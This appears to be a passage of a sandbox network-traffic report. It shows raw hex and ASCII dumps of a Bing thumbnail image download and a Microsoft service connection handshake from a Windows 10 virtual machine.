                                                                                                                                                                                                                                                                            2024-12-27 06:09:24 UTC16384INData Raw: da dd 7e f7 de f7 a9 36 11 0e 03 7c df ec ae da 55 8d d9 94 3f 98 a2 3f e2 fb db b8 e9 40 ae 55 66 77 99 51 19 7c b5 c7 cd b7 bf a0 a9 d6 39 cc 8c 5f e6 2a d9 dc df 2e d1 52 ac 11 9d d8 7d c3 fd df 9b f0 a9 71 18 55 ca ed da bf 75 68 13 65 7f 24 bc 8a c1 79 5f e2 65 ee 7b d4 91 c0 eb 33 49 e6 ab 33 7d df 96 9a cf 1c 73 2a 3b 34 6b fc 3b 7f 88 d4 cc a1 d7 e7 6d cb fc 5b 7e 56 a3 40 23 92 3b 81 d6 7f bb cb 33 52 c6 46 d5 f2 fe 6e bf fe ba 73 08 0f f0 ee 1f dd fe ed 2a a2 23 64 ee ca ff 00 9e 94 01 14 8a 3e 53 2c fe 9f 2e ed ab 42 ab 96 6f 9b f8 be eb 2f f2 a9 a4 b7 49 24 91 bf 85 54 1f f1 a4 92 28 21 8d 52 39 5a 38 ba 2a ff 00 77 da 80 1b e5 c6 df 27 e1 f3 53 61 8e 34 6f 30 2e d2 dc 55 a8 79 85 8a ee 63 f8 7f fa e9 19 11 63 62 f1 33 32 ff 00 c0 5a 80 22 91
                                                                                                                                                                                                                                                                            Data Ascii: ~6|U??@UfwQ|9_*.R}qUuhe$y_e{3I3}s*;4k;m[~V@#;3RFns*#d>S,.Bo/I$T(!R9Z8*w'Sa4o0.Uyccb32Z"
                                                                                                                                                                                                                                                                            2024-12-27 06:09:24 UTC16384INData Raw: a0 95 82 ff 00 16 da ae d6 36 31 5e 47 e6 59 b6 dd b9 f3 57 3f d2 8e 64 2e 46 66 7f a4 99 96 47 b9 e5 7f bb fc 35 6e d2 fe f2 18 f7 79 ed 29 dd 5b 71 e9 f1 ed ca 41 b8 7f ba 69 9e 48 0d cd 8b 2a ee c6 ed b5 2e 48 b5 06 66 7f 6b dc 16 6c 41 e6 33 36 7e 6c 35 39 f5 3b c1 0f cf 04 0d 23 36 77 32 ff 00 4a b3 73 37 d9 f7 24 16 db 99 7e ea fb d6 66 fb fb 8b 89 25 68 36 fc d8 db b7 fa 53 8d ba 93 29 3b e8 17 9a de b0 61 f2 a2 78 e3 0b cf ca b5 91 79 7f ac c8 dc df 4f ff 00 01 6c 56 9c c2 e4 36 5e 3f f7 57 6e da 48 6d ee 27 66 4f 2f 6e df f8 0d 17 4b a0 bd e6 65 c3 7f e2 05 e0 6a 73 b0 c6 36 c9 f3 70 7e b4 b1 be a3 33 2c 2e de 60 ff 00 a6 9f 35 69 8d 3e f7 ed 8a 82 26 ee 76 d6 d6 8b 61 3b 2b 17 89 57 fd ea 5e d2 28 71 a7 26 72 93 59 dc 79 78 57 ff 00 be 6a 0f ec
                                                                                                                                                                                                                                                                            Data Ascii: 61^GYW?d.FfG5ny)[qAiH*.HfklA36~l59;#6w2Js7$~f%h6S);axyOlV6^?WnHm'fO/nKejs6p~3,.`5i>&va;+W^(q&rYyxWj
                                                                                                                                                                                                                                                                            2024-12-27 06:09:24 UTC16384INData Raw: b1 ea 2a 8b 5b c7 3e d8 0d cb 34 be 41 2b 1c 79 d8 a7 b1 2d c6 ef eb 51 7b c8 b6 ad 11 92 7d 93 4f 5f b4 98 99 fc d5 cf ef 31 b6 39 3b 63 3d cf af ad 54 86 d2 0b db 89 26 95 7e 68 f9 91 a4 63 f5 ed 8c 91 52 6a 93 8b 8b e5 b3 93 cc 61 1e 3f 87 e5 6c f0 57 fd a0 7f f1 da d1 b1 b7 b6 48 d6 5b c8 37 5b da c9 9f dd e5 95 8f 41 80 39 e2 b4 94 ac 67 18 dc d0 d2 e1 48 e3 87 cb 89 56 29 30 17 6e 15 a3 f4 ce 7a ff 00 3a b1 aa 39 b4 f2 c0 5e 36 e1 5a 5f 95 bf c7 75 46 8d 25 ad 9a ed 65 7f b4 cf 9f 9a 3d ca a8 79 ed fe cf e3 5c ee ad aa bc fa d7 c8 cd f6 78 17 0a aa db 91 8f f7 80 f5 15 9a 4e 4c d5 b5 14 59 61 9b 8c ed 8d 46 e6 f3 57 df b0 1d b9 a8 e1 9d 27 56 b6 b9 89 5b cb 88 19 65 92 3d a8 d9 ec 00 e4 f1 59 49 77 e4 5c 33 c1 e6 4b 1b a9 dc bf c2 b9 e9 f9 54 d6 b1
                                                                                                                                                                                                                                                                            Data Ascii: *[>4A+y-Q{}O_19;c=T&~hcRja?lWH[7[A9gHV)0nz:9^6Z_uF%e=y\xNLYaFW'V[e=YIw\3KT
                                                                                                                                                                                                                                                                            2024-12-27 06:09:24 UTC16067INData Raw: 6f 99 79 cf 5e d9 ef 54 35 87 48 a4 92 34 dd 2d d5 f4 86 49 26 dc 59 55 07 53 c7 f0 85 ad db 6b 59 e1 fd e4 9f bb 8e 38 c9 66 fb bb bd 06 7f ba 2b 9c d1 6d 6f ee a4 6d 42 e2 28 da 36 63 e4 47 e6 ff 00 07 5d a7 d3 26 8b d9 05 ae c9 6c 74 f8 56 19 24 8e 28 a3 31 e3 6e d5 dc ab f9 f3 5a 0b 6f 19 8d 5b ca e7 77 dd ff 00 eb 55 d1 0f 95 6e bf ba 55 75 5c c8 ab f7 73 e9 f8 52 60 ab 79 85 59 a3 76 01 7e 5f f5 7e b9 f4 1f 5a 89 49 97 18 a3 1a f2 d9 1e 46 40 ac a5 71 fe cf eb e9 49 0c 07 cb 5c c4 bf 2b 7c ab cf f3 ad 4b 90 57 8f f5 92 26 4f 97 1c 7b 99 aa 08 49 f3 1b cd f9 7e 6f 97 e5 db bb 8c ed f7 c7 ad 45 d9 5c a8 a6 b6 68 17 1f 33 1e 7e 66 6a ac f6 a4 b3 7e e3 77 fb cd fa 56 dc d2 46 ab 9d ad 86 53 f2 b2 f7 1d aa 15 6d f1 b2 6d 56 2b 82 df ed 71 fc 34 b9 98 59
                                                                                                                                                                                                                                                                            Data Ascii: oy^T5H4-I&YUSkY8f+momB(6cG]&ltV$(1nZo[wUnUu\sR`yYv~_~ZIF@qI\+|KW&O{I~oE\h3~fj~wVFSmmV+q4Y
                                                                                                                                                                                                                                                                            2024-12-27 06:09:24 UTC16384INData Raw: 2e e3 ba 3d bf cb de 9f b4 6f 74 47 22 5d 48 34 dd 42 2b 98 d9 cc 5b a4 5c 7c ac dd e9 d7 46 ea 49 19 b7 7e ed 7f 8b 9d ad 9f 4c 75 c5 64 dc ac a2 e1 9e da 26 51 fc 3b 97 fa 56 b6 89 71 2b fe ea e2 05 52 bf 75 97 e6 a7 65 15 70 e6 6f 42 c5 9d eb 79 3e 5b ee 88 71 b7 cb 8c 32 b7 d6 a5 79 f3 6a dc ed 0a d9 65 6c 75 ad 3b 5b 58 a4 da 06 d5 3f c5 f2 9e dd bd ea e2 e9 b6 b2 46 a0 ca ac 38 3b 95 47 f9 fc 6b 39 49 5c d1 45 9c 95 d4 ef 1a f9 f2 b3 40 77 7c be 62 8d cd f8 56 86 8f 75 76 f3 6f 96 29 22 8f 76 36 af f0 a1 f5 ab 3a 94 51 34 8d 1c 52 73 12 ee da d8 fd 33 59 89 7f 6f 14 cb 1c b3 b4 81 ff 00 bb f3 73 4f 56 b6 25 e8 cd 7b f8 61 92 65 70 db 95 71 fe d3 73 54 a4 b2 4f 2d 77 dc f9 8a cd 95 f9 76 ed fa 55 9b 51 69 32 b0 17 4d b5 be 6d bf de f7 ab d6 d0 58 48
                                                                                                                                                                                                                                                                            Data Ascii: .=otG"]H4B+[\|FI~Lud&Q;Vq+RuepoBy>[q2yjelu;[X?F8;Gk9I\E@w|bVuvo)"v6:Q4Rs3YosOV%{aepqsTO-wvUQi2MmXH
                                                                                                                                                                                                                                                                            2024-12-27 06:09:24 UTC16384INData Raw: c1 01 5f dd c7 14 6a 36 b1 f5 46 39 ed c7 d6 b0 6f 75 a3 77 0a ef 66 f2 e7 8f 2d f3 7e f1 47 65 63 d8 67 34 b5 65 7b a8 bc da 0d bc 97 5b e4 be 8e 08 a2 8f f7 91 ee dc d9 5e c4 8e 30 7f 9d 24 70 e8 36 96 ed 07 95 72 de 5c 85 1b 6a 9d b9 3f 31 3c f5 ac 25 92 61 6e b6 b3 f9 76 ca cd e4 ac 5b b6 b3 3f 55 20 fb 54 7a 95 ed fc 5a 7f ef e5 6d db b2 de 64 a3 e6 c1 e0 fa 8f a5 0d 5f a9 2a cb 64 68 5c eb 16 f6 9b 63 8a c6 38 ee 19 8e d6 56 f9 97 3c 7d da a3 ff 00 09 3a 43 a9 46 b7 31 ac 52 ee 6f 9a 35 fb c0 0f bd fe cf e3 58 57 37 72 fc c9 b7 cd 65 6d f1 ff 00 b5 9c 76 eb 8a b6 d7 7e 5c 92 ce 57 cc 8f cb 1f bb 91 7e 66 cf 39 a3 d9 c4 14 e4 58 6d 6e 4b bd 62 39 d3 72 19 3e 79 16 46 3b 24 1d 39 1f c3 fd 6a b3 4f 77 3e d7 bc 6e 27 69 07 99 f7 76 81 dc 0e 98 f6 aa 31
                                                                                                                                                                                                                                                                            Data Ascii: _j6F9ouwf-~Gecg4e{[^0$p6r\j?1<%anv[?U TzZmd_*dh\c8V<}:CF1Ro5XW7remv~\W~f9XmnKb9r>yF;$9jOw>n'iv1


                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                            11192.168.2.649749150.171.27.10443
                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                            2024-12-27 06:09:23 UTC375OUTGET /th?id=OADD2.10239360172398_1SAKF1TLLO2IFUJXJ&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/1.1
                                                                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
                                                                                                                                                                                                                                                                            Host: tse1.mm.bing.net
                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                            2024-12-27 06:09:23 UTC861INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=2592000
                                                                                                                                                                                                                                                                            Content-Length: 533370
                                                                                                                                                                                                                                                                            Content-Type: image/jpeg
                                                                                                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                            Access-Control-Allow-Headers: *
                                                                                                                                                                                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                                                                                                                                                            Timing-Allow-Origin: *
                                                                                                                                                                                                                                                                            Report-To: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
                                                                                                                                                                                                                                                                            NEL: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
                                                                                                                                                                                                                                                                            X-Cache: CONFIG_NOCACHE
                                                                                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                                            X-MSEdge-Ref: Ref A: 6BB23E864FE84733B0F0C3363023468C Ref B: EWR30EDGE1410 Ref C: 2024-12-27T06:09:23Z
                                                                                                                                                                                                                                                                            Date: Fri, 27 Dec 2024 06:09:23 GMT
                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                            2024-12-27 06:09:23 UTC3517INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 48 00 48 00 00 ff e1 00 da 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 07 01 12 00 03 00 00 00 01 00 01 00 00 01 1a 00 05 00 00 00 01 00 00 00 62 01 1b 00 05 00 00 00 01 00 00 00 6a 01 28 00 03 00 00 00 01 00 02 00 00 01 31 00 02 00 00 00 1f 00 00 00 72 01 32 00 02 00 00 00 14 00 00 00 92 87 69 00 04 00 00 00 01 00 00 00 a6 00 00 00 00 00 00 00 60 00 00 00 01 00 00 00 60 00 00 00 01 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 32 34 2e 34 20 28 57 69 6e 64 6f 77 73 29 00 00 32 30 32 33 3a 30 35 3a 31 33 20 31 38 3a 34 34 3a 32 30 00 00 03 a0 01 00 03 00 00 00 01 ff ff 00 00 a0 02 00 03 00 00 00 01 07 80 00 00 a0 03 00 03 00 00 00 01 04 38 00 00 00 00 00 00 00 00 ff db 00 43 00 04 02 03 03 03 02 04 03 03 03
                                                                                                                                                                                                                                                                            Data Ascii: JFIFHHExifMM*bj(1r2i``Adobe Photoshop 24.4 (Windows)2023:05:13 18:44:208C
                                                                                                                                                                                                                                                                            2024-12-27 06:09:23 UTC8192INData Raw: 56 15 31 46 ca 39 87 ec ca fe 5e 68 d9 8a b2 a9 4b e5 7f 9c 52 e6 17 b3 2a ec cd 1b 2a cf 97 4a b1 d3 e6 0f 66 55 d9 4b b4 55 9f 2a 91 62 c5 2e 60 f6 6c 80 c6 0a d2 6c ab 4b 1d 27 97 da 8e 60 f6 65 75 4f 9a 97 66 6a c7 97 4a d1 d1 cc 3e 42 be ca 5d 95 3a a7 cb 4a b1 e6 97 30 f9 0a fb 28 d9 56 3c af 6a 72 c7 8a 5c c2 f6 65 65 8e 8d 95 6b cb 6a 19 28 e6 1f 21 5f 60 a3 67 cb 56 56 3f 5a 19 29 73 0f 90 ad e5 d1 e5 b5 59 d9 4b b3 34 73 31 f2 15 b6 52 ec ab 3e 5d 2a c6 b4 73 07 21 59 a3 f9 69 52 30 3a d5 af 2f 14 79 74 73 0f d9 d8 ad e5 e6 8f 2e ad 2a 50 cb 4b 98 7e cc a7 e5 62 97 cb c7 35 6b 65 26 ca 7c c2 e4 20 d9 42 c7 56 36 52 ec a9 e6 2b 94 ac b1 b5 2a c7 56 55 33 49 b2 8e 60 e4 20 68 e8 f2 fd 6a ce d1 43 47 47 30 fd 99 5f cb c5 3b 66 2a 75 4c 50 a9 9a 5c
                                                                                                                                                                                                                                                                            Data Ascii: V1F9^hKR**JfUKU*b.`llK'`euOfjJ>B]:J0(V<jr\eekj(!_`gVV?Z)sYK4s1R>]*s!YiR0:/yts.*PK~b5ke&| BV6R+*VU3I` hjCGG0_;f*uLP\
                                                                                                                                                                                                                                                                            2024-12-27 06:09:23 UTC4144INData Raw: ea ce ca 19 28 e6 0e 52 bf 97 4a a8 2a 7d 94 bb 3d a8 e6 1f 29 5f 65 1b 2a c6 cf 6a 36 51 cc c1 c4 83 6d 0a b5 3a ad 1b 68 e6 1f 29 01 46 a1 52 a7 db 9a 5d 86 8e 66 1c 84 0a 94 bb 2a 7d 94 6c a9 e6 0e 52 0d 94 6c a9 f6 51 b1 85 1c c3 e5 21 d9 49 b2 a7 d9 46 cc d1 cc 1c a5 76 43 b6 8d 95 65 52 91 53 14 73 07 29 0e ca 19 2a 7d 99 a3 65 1c cc 7c a5 66 5a 36 54 ec 94 2a 51 cc 2e 52 1d b4 8c b9 a9 f6 51 b2 a7 98 7c ac ae cb 46 ca b1 b2 91 97 34 f9 98 72 90 6d a3 66 6a 7d 9f 2d 1b 28 b8 72 b2 0d 94 2a 54 db 29 76 d2 e6 0e 52 16 4a 36 0a 9f 65 26 ca 39 83 94 83 65 0c 82 a7 d9 49 b2 8e 60 e5 20 f2 e8 db 53 ec a3 60 a3 98 39 48 36 d0 cb 9a 9b 65 26 ca 39 83 94 87 65 1b 2a 6d b4 bb 05 1c cc 39 48 36 0a 4d b5 3b 25 1b 28 e6 0e 52 0d b4 9b 6a c3 28 a4 54 a3 98 39 48
                                                                                                                                                                                                                                                                            Data Ascii: (RJ*}=)_e*j6Qm:h)FR]f*}lRlQ!IFvCeRSs)*}e|fZ6T*Q.RQ|F4rmfj}-(r*T)vRJ6e&9eI` S`9H6e&9e*m9H6M;%(Rj(T9H
                                                                                                                                                                                                                                                                            2024-12-27 06:09:24 UTC8192INData Raw: d9 4b b7 34 73 07 2b 21 db 42 a5 4f b2 8d b8 a3 98 7c a4 3b 28 d9 53 6c a5 d9 47 30 72 90 ec a5 54 a9 76 52 ec a5 cc 1c a4 3b 28 d9 53 6c a3 65 17 0e 54 45 b2 8d bf 2d 4d b2 8d 94 5c 39 51 0e da 5d b5 36 ca 36 d1 70 e5 21 d9 4b b6 a5 54 a3 65 17 0e 52 25 5a 5d 95 2e cc 52 ed a5 cc 1c a8 87 6d 1b 6a 6d 94 6c a3 98 39 51 0e da 5d b5 36 da 36 51 cc c3 95 10 b2 d2 aa d4 db 28 d9 47 30 ec 88 76 d2 ec a9 b6 0a 36 d2 bb 0e 52 0d 94 bb 2a 7d b4 2a d3 e6 61 64 43 b2 93 6d 4f b6 97 65 2b 8e c4 1b 68 d9 53 ec a3 65 17 02 0f 2e 97 65 4f b6 93 65 17 0e 52 1d 94 6c a9 f6 d1 b6 90 15 d5 28 64 a9 f6 51 b2 80 b3 21 54 a3 6d 4d b3 34 6d a0 2c c8 76 d1 b2 a6 db 49 b0 d0 3b 11 6d a3 6d 4d b6 8d b4 68 16 64 5b 29 36 54 db 68 db 46 81 62 1d b4 6d a9 76 d2 ed a3 40 b1 0e da 36
                                                                                                                                                                                                                                                                            Data Ascii: K4s+!BO|;(SlG0rTvR;(SleTE-M\9Q]66p!KTeR%Z].Rmjml9Q]66Q(G0v6R*}*adCmOe+hSe.eOeRl(dQ!TmM4m,vI;mmMhd[)6ThFbmv@6
                                                                                                                                                                                                                                                                            2024-12-27 06:09:24 UTC8192INData Raw: 13 53 69 fa 55 cd b7 9b 2f 9f e6 4b 2f f1 48 a3 6f d0 7f 74 54 49 a8 9b 45 4a 45 9b 74 b0 dd 87 db 2b 37 0d f2 ee dd ed d2 ad c6 f1 46 aa 6d ed 20 5d df c5 e5 86 ac e5 d1 ae e5 d4 16 e4 df 33 4a ab 85 db f2 a2 fe 15 2e 8b e1 f8 f4 c8 64 28 b2 4a 25 95 a4 6d d2 16 f9 cf de eb fc 27 d2 b3 e6 f2 36 51 6b a9 7d ef 8b 42 bb 24 f3 3b 2a af cb b8 fb 1c d4 1e 7c ee db 23 4e 5b e8 d5 3a d8 f9 8a a9 e5 2b 2f f0 ed 5f bb 56 2d f4 98 dd 77 dc 6e f4 f9 58 a8 e2 87 26 83 95 19 c8 50 4d b0 b7 99 27 1f bb 58 c7 7a 96 48 ef 36 a9 b4 8a 05 3b 86 e6 96 3e de db 7b d6 d4 76 50 2f 06 35 f9 b9 fb c5 a8 69 63 5d c0 7c df de 55 5a 5c f3 0e 58 99 c6 29 82 e5 2d 9b e6 5c ed e3 e6 3e 9d b1 f8 d2 aa ca 5b 71 f9 47 4f 9b 1b 7f 4a 9d 25 46 66 11 ac 9f 37 f0 b3 73 52 48 cc ab b0 2a fa
                                                                                                                                                                                                                                                                            Data Ascii: SiU/K/HotTIEJEt+7Fm ]3J.d(J%m'6Qk}B$;*|#N[:+/_V-wnX&PM'XzH6;>{vP/5ic]|UZ\X)-\>[qGOJ%Ff7sRH*
                                                                                                                                                                                                                                                                            2024-12-27 06:09:24 UTC8192INData Raw: 93 50 60 bc ca ca 5b fb b5 4d af 24 69 15 21 b6 69 03 73 b9 a4 15 d1 1c 0d b7 67 2c f3 85 f6 55 cd 77 10 47 d2 08 d4 2f 35 0b 5c 5a 86 c0 5e 5b ef 36 da a9 1b e1 7c b9 23 dd bb 9f bd bb 69 a4 12 67 91 07 2a df c5 f7 6b a2 38 28 2d d9 cb 2c da ab d9 17 7e d7 a5 ff 00 aa 31 48 d2 2f de 6d a3 14 c6 9e ce 49 19 f7 48 aa df 4a a7 21 b9 dd f7 61 8d 7f 87 e5 f9 aa 26 33 f9 38 1f 31 dd f7 b6 86 da 2b 65 86 82 e8 73 3c c6 bc b7 65 a7 31 1d df 7b 1d 3b b5 5b b5 58 f6 fe ef af fb 5f 35 64 bb de ac 6a 44 bf 37 f0 aa a8 fd 6a bb fd ae 4e 45 f3 2b 2f de 65 5f ca 87 87 be c1 1c 76 b7 6a e7 44 af 00 8f 32 7c a3 77 f1 73 fa 53 5d 46 ec a2 ab 6d fb b5 8d 1c d7 e3 6b 9b ed df de dd 15 3e 4b bd 40 aa c7 1c ec b1 b7 fc f3 8f 6b 56 2f 05 7e a7 54 73 6e 5f b2 6b 2e 04 78 2b ff
                                                                                                                                                                                                                                                                            Data Ascii: P`[M$i!isg,UwG/5\Z^[6|#ig*k8(-,~1H/mIHJ!a&381+es<e1{;[X_5djD7jNE+/e_vjD2|wsS]Fmk>K@kV/~Tsn_k.x+
                                                                                                                                                                                                                                                                            2024-12-27 06:09:24 UTC8192INData Raw: 4f 65 21 55 fb 37 2a df c2 df 43 49 5d 47 08 da 29 71 46 28 01 29 1a 96 8a 00 6d 14 b8 a3 14 68 03 28 a7 53 69 5c 02 8a 5c 52 63 da 90 05 36 9d 45 00 36 8a 75 14 00 da 4c 53 e9 31 40 0d c5 18 a7 62 9c b0 ca cb 91 13 30 ff 00 76 81 11 51 50 6a ba 86 99 a6 43 2c ba 9e a7 65 6a b0 2e f9 7c fb 95 53 18 1d c8 ce 7f 4a e2 3c 4d f1 7b c2 f6 5a 3c 17 de 1f 8e 7f 13 35 cb 7e e9 2c 64 48 c6 3b b1 69 31 d3 d3 19 a8 95 48 45 d9 bd 4d a9 e1 ab 55 57 84 5b fc be f3 be c7 b5 26 2b ca 2f be 30 6a 72 6d 5d 3f 41 b4 8b e5 f9 a4 b9 f3 5d 57 eb b3 1d 2b 37 5e f8 a5 e3 81 6a a3 4f 4d 0a 09 7a ac 8d 65 33 a4 83 fe 04 78 ae 69 63 a8 c7 bf dc cf 46 19 16 32 5d 12 f9 a3 da 28 c7 b5 7c d2 bf 14 be 33 5e 6a 4d 6f 6f ae 68 d2 95 fb d1 69 be 1c f3 24 51 d3 a3 b0 1f ad 59 d4 fe 21 7c
                                                                                                                                                                                                                                                                            Data Ascii: Oe!U7*CI]G)qF()mh(Si\\Rc6E6uLS1@b0vQPjC,ej.|SJ<M{Z<5~,dH;i1HEMUW[&+/0jrm]?A]W+7^jOMze3xicF2](|3^jMoohi$QY!|
                                                                                                                                                                                                                                                                            2024-12-27 06:09:24 UTC8192INData Raw: 99 27 87 3e 88 7e 41 f8 e6 b8 a6 8f 54 ba d3 d6 5b fd 4f 50 ba b9 6b 63 14 f3 fd ae 54 59 32 30 76 80 70 b9 f6 ac 9d 03 5f 6d 5f cc d4 f5 08 35 0b ad 4a f1 7c db 98 2d 20 79 a1 85 cf ac cc aa 1b fa 55 8b ad 53 50 85 9b cf 65 80 f1 f3 49 b1 f6 fb 6d 5a f1 71 95 69 55 9d 9c 99 f6 b9 5e 0d e1 e9 2b 45 5f ab f3 39 ed 1f c1 de 06 f0 c6 83 62 f2 69 52 30 d3 64 69 e0 9e e7 e6 ba f3 09 27 99 18 ee 63 cf 73 d2 aa db 78 97 4c bc b8 9f 50 b4 b3 d4 b5 39 5f ee ad 8d a6 e4 5c 1c 6d f3 1f 68 26 b6 75 bb ff 00 3a e1 a4 48 96 51 1e 36 c5 22 ee f3 08 eb cb 0c 66 9b 69 7f a8 49 a9 33 cb a7 dc c5 6d b4 79 7e 5c e3 73 1f f7 47 dd 15 4a bc 29 d2 6a 8b b3 7b b6 f5 fc fe f2 a5 86 95 4a ab db 24 e3 17 ee a4 bf 3d 3a 12 a4 fa 99 b7 69 53 4c 68 9b 6e d8 e4 9e e4 3b 73 fe ca 80 38
                                                                                                                                                                                                                                                                            Data Ascii: '>~AT[OPkcTY20vp_m_5J|- yUSPeImZqiU^+E_9biR0di'csxLP9_\mh&u:HQ6"fiI3my~\sGJ)j{J$=:iSLhn;s8
                                                                                                                                                                                                                                                                            2024-12-27 06:09:24 UTC8192INData Raw: b8 75 c6 d5 c7 f7 95 80 a8 f6 dc fd c0 d1 ff 00 c0 9a ad ba 5b db b6 5e 2d c3 fb cc c7 6f f2 aa b7 5a d5 84 51 e6 df 4f 69 e4 e9 fb bf 94 7e 66 b7 a7 85 ad 29 5b a9 8d 4c 55 28 45 c9 ec 25 c4 33 25 bb 4b 25 dc 7b 57 96 5f ef 56 44 3a b0 99 5a 49 67 68 a3 5f f6 42 af e7 52 de 6a ba 9c df 24 56 36 9f 37 f0 ca c5 bf 96 2a 88 d3 6e 2f ee 96 79 20 f3 19 78 55 db 88 e3 c7 a6 38 fc 6b a5 d3 8d 1f 76 f7 91 cb 1a b2 ae b9 ad 68 f9 f5 fb cb d2 5e 69 71 47 be 5b bf bd f7 55 54 b3 31 fa 54 33 5d cb 27 cd 61 63 79 20 ff 00 9e 8d f2 a6 3f 1e 95 9b ad 5d ff 00 65 48 d0 69 cb 0c f7 8d f7 99 b3 27 93 f4 ed 58 d7 57 ba c5 cc 7e 5c b7 d7 32 c8 bf 76 38 e4 d8 98 3e b8 eb 5d f4 30 b3 69 4a a3 b7 97 53 ce c4 63 e3 19 3a 74 e3 7b 75 e8 67 5f fe d5 96 76 d2 31 1f 0a 3c 49 24 3e
                                                                                                                                                                                                                                                                            Data Ascii: u[^-oZQOi~f)[LU(E%3%K%{W_VD:ZIgh_BRj$V67*n/y xU8kvh^iqG[UT1T3]'acy ?]eHi'XW~\2v8>]0iJSc:t{ug_v1<I$>
                                                                                                                                                                                                                                                                            2024-12-27 06:09:24 UTC8192INData Raw: 0c cb 16 e4 6f 71 c6 47 d0 d6 f4 33 e9 93 43 e6 43 a9 f9 aa df c5 1f 35 e2 37 5a 3e 24 f3 ad ee 6e 61 e9 bb 73 6e 5f e7 4b 6a 7c 4b a7 4c b3 69 5a 96 d9 57 95 56 6f 97 f2 35 d7 0c 7c a3 a4 a3 73 8e a6 05 4a ee 32 3d 91 6d f4 75 93 2d 3c f3 1d d9 fd e6 4f f4 a4 92 e2 c1 7f d5 41 72 fb 7f ba bb 56 bc ce cf e2 6f 88 6c e4 54 d6 74 85 78 fa 79 90 2e 1b eb d7 06 ba 7d 17 c6 96 7a ac 2a 2d a5 f3 26 6f bc bb 76 fe 84 d6 eb 17 4a da 2f c0 cf ea b5 6f ab bf cf fe 01 b9 71 78 47 23 4f 9b fe da 37 ff 00 5a a2 5b db 90 b9 7b 15 ff 00 81 29 a8 2e 35 d3 0a ed 9e e6 da 3e e9 bf 0a 5b f5 eb 58 1a e7 8b ed 52 dd 8d bd ca b4 bd 56 39 21 db c7 ae 4d 1f 59 87 32 d7 f0 2d 61 e4 a3 b7 e2 6a 5f eb 12 c1 32 ab 34 0c d2 7d d5 8d 6a 04 d5 e6 66 68 d2 29 65 6f ef 2a fd da c8 f0 8d
                                                                                                                                                                                                                                                                            Data Ascii: oqG3CC57Z>$nasn_Kj|KLiZWVo5|sJ2=mu-<OArVolTtxy.}z*-&ovJ/oqxG#O7Z[{).5>[XRV9!MY2-aj_24}jfh)eo*


                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                            12192.168.2.64974820.198.118.190443
                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                            2024-12-27 06:09:24 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 78 71 6f 47 6e 47 4f 45 41 55 6d 43 32 67 64 2f 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 37 66 65 30 37 66 65 30 35 64 63 63 36 32 36 35 0d 0a 0d 0a
                                                                                                                                                                                                                                                                            Data Ascii: CNT 1 CON 305MS-CV: xqoGnGOEAUmC2gd/.1Context: 7fe07fe05dcc6265
                                                                                                                                                                                                                                                                            2024-12-27 06:09:24 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                                                                                                                                                                                                                                                                            Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
